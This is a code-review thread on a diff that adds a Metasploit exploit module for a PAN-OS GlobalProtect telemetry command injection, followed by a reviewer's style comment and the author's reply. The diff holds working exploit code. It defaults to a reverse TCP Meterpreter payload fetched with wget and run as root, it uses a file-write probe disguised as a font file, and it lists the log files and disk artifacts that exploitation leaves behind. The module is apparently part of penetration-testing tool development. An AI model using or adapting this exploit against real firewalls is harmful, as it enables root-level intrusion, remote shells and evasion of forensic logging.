modules/exploits/linux/http/panos_telemetry_cmd_exec.rb

```diff
@@ -0,0 +1,131 @@
+        ],
+        'DisclosureDate' => '2024-04-12',
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'Privileged' => true, # Executes as root on Linux
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'FETCH_COMMAND' => 'WGET',
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          'WfsDelay' => 36000, # 1h, since telemetry service cronjob can take up to an hour
+          'StagerRetryWait' => 3600 # 1h,since telemetry service cronjob can take up to an hour
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created.
+            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log.
+            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests.
+            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected.
+            ARTIFACTS_ON_DISK
+            # Several 0 length files are created in the following directories during exploitation:
+            # - /opt/panlogs/tmp/device_telemetry/day/
+            # - /opt/panlogs/tmp/device_telemetry/hour/
+            # - /opt/panlogs/tmp/device_telemetry/minute/
+            # - /var/appweb/sslvpndocs/global-protect/portal/fonts/
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),
+      ]
+    )
+  end
+
+  def check
+    # Try to create a new empty file in an accessible directory with the exploit primitive
+    file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
+    touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")
+
+    # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
+    res_check_created = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri("/global-protect/portal/fonts/#{file_check_name}")
+    )
+
+    res_check_not_created = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri("/global-protect/portal/fonts/X#{file_check_name}")
+    )
+
+    if (res_check_created&.code != 403) || (res_check_not_created&.code != 404)
+      fail_with(Failure::UnexpectedReply, 'Arbitrary file write did not succeed!')
```

Comment:
We shouldn't call `fail_with` in the check method, and instead return the appropriate CheckCode: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html

Reply:
Thank you! This was changed, and I'll implement this in all modules moving forward.